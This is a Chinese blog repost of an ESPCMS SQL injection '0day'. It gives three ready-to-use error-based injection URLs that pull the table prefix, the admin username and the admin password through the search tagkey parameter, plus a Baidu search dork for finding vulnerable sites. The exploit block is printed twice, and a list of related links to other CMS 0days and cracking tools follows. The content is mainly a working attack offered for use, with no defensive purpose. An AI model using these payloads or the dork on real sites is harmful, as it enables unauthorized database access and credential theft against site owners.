espcms最新注入0day
2011-12-16 08:25
176 查看
积木网络上EXP,一步步来。暴出表前缀后,在修改后两句代码里面的表前缀。
爆表前缀:
index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,table_name,0x27,0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables
group by x)a)%23
暴管理员用户名:
index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,username,0x27,0x7e)) from 前缀_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
暴管理员密码:
index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,password,0x27,0x7e)) from 前缀_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
百度关键字:
inurl:index.php?ac=article&at=read&did=
日期:2011-11-30
本文转自Linux安全网
爆表前缀:
index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,table_name,0x27,0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables
group by x)a)%23
暴管理员用户名:
index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,username,0x27,0x7e)) from 前缀_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
暴管理员密码:
index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,password,0x27,0x7e)) from 前缀_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
百度关键字:
inurl:index.php?ac=article&at=read&did=
日期:2011-11-30
本文转自Linux安全网
相关文章推荐
- ESPCMS最新cookie注入漏洞分析
- (织梦cms)dedecms5.7注入和上传0day
- 最新 DEDECMS SQL 注入 0day
- shopxp网上购物系统v7.4最新注入0day
- dedecms最新注入漏洞
- 迅雷最新版本存在严重的远程拒绝服务漏洞(0day)
- ESPCMS基本导航操作
- 5ucms 最新版 sql 注入漏洞
- 帝国CMS利用SQL调用已注册会员总数及最新会员名字方法
- ECShop 2.7.2 最新任意用户登陆漏洞0day
- phpcms authkey注入中转脚本
- dedecms5.7最新注入和上传漏洞
- 【神器】注入神器胡萝卜havij pro 1.17破解版|至20130410最新版
- 动网8.0sql最新注入漏洞+利用工具
- 易思企业网站管理系统ESPCMS去前台版权
- PHPCMS_V9注入0DAY___EXP已构造
- windows最新0day 通杀所有版本提权工具
- 【0day shellcode编写艺术】—— jmp esp、动态获取api。后续:编码、压缩
- 暂时屏蔽 IE 最新 0day的4 种方法
- freetextbox最新上传0day